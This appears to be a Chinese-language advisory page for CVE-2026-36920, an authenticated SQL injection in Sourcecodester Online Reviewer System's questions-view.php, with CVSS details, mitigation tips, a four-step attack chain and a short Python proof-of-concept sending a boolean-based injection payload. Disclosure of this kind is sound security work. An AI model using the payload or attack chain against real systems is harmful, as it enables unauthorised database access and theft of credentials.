CVE-2026-36920 CVSS 2.7 低危

CVE-2026-36920 Sourcecodester Online Reviewer SQL注入漏洞

披露日期: 2026-04-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-36920

漏洞类型

SQL注入

CVSS评分

2.7 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Sourcecodester Online Reviewer System

漏洞概述

Sourcecodester Online Reviewer System v1.0 在其 `/questions-view.php` 文件中存在SQL注入漏洞。该漏洞源于应用程序未能正确过滤用户输入，导致攻击者可以将恶意SQL代码注入查询语句中。尽管利用此漏洞需要高权限，但一旦成功，攻击者可能窃取数据库中的敏感信息，对系统机密性造成威胁。

技术细节

该漏洞位于 Sourcecodester Online Reviewer System v1.0 的 `/system/system/admins/assessments/examproper/questions-view.php` 路径下。漏洞的根本原因是开发人员在编写代码时，直接将用户通过HTTP请求提交的参数拼接到了后端SQL查询语句中，而没有使用预编译语句（Prepared Statements）或进行严格的输入验证。根据CVSS 3.1评分向量，该漏洞的攻击复杂度为低（AC:L），攻击向量为网络（AV:N），但需要高权限（PR:H）账户才能访问该接口。攻击者无需诱导用户交互（UI:N），只需在登录管理员账户后，向受影响端点发送包含SQL注入载荷的请求，即可操纵数据库逻辑。这可能导致绕过认证或直接提取敏感数据，对系统的机密性（C:L）构成威胁，但对完整性（I:N）和可用性（A:N）暂无直接影响。

攻击链分析

STEP 1

步骤1：获取凭证

攻击者首先需要通过钓鱼、暴力破解或其他手段获取Sourcecodester Online Reviewer System的管理员账户凭证，因为利用该漏洞需要高权限（PR:H）。

STEP 2

步骤2：访问漏洞接口

攻击者使用获取的管理员会话登录系统，并导航至存在漏洞的接口 `/system/system/admins/assessments/examproper/questions-view.php`。

STEP 3

步骤3：构造注入载荷

攻击者在HTTP请求的参数（如ID参数）中插入恶意SQL语句（如 `UNION SELECT` 或布尔盲注语句），试图篡改后台数据库查询逻辑。

STEP 4

步骤4：窃取数据

服务器解析并执行恶意SQL代码，将查询结果（如用户名、密码哈希等敏感信息）返回给攻击者，导致数据泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL configuration
url = "http://target-ip/system/system/admins/assessments/examproper/questions-view.php"

# Attacker needs a valid admin session cookie (High Privilege Required)
cookies = {
    "PHPSESSID": "valid_admin_session_id"
}

# Vulnerable parameter (example: 'id' or 'question_id')
# Payload to test for SQL Injection (e.g., boolean-based blind)
payload_params = {
    "id": "1' AND 1=1-- -"
}

try:
    response = requests.get(url, params=payload_params, cookies=cookies, timeout=10)
    
    # Check if the application responds differently to the payload
    if "Error" not in response.text and response.status_code == 200:
        print("[+] Potential SQL Injection vulnerability detected!")
    else:
        print("[-] Vulnerability not confirmed or WAF blocked.")
        
except Exception as e:
    print(f"[!] Error during PoC execution: {e}")

影响范围

Sourcecodester Online Reviewer System v1.0

防御指南

临时缓解措施

建议立即检查并升级系统到最新版本（如果厂商发布补丁）。在未修复前，应严格限制管理员账户的访问来源IP，并加强对后台异常请求的监控日志审计，防止漏洞被利用。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表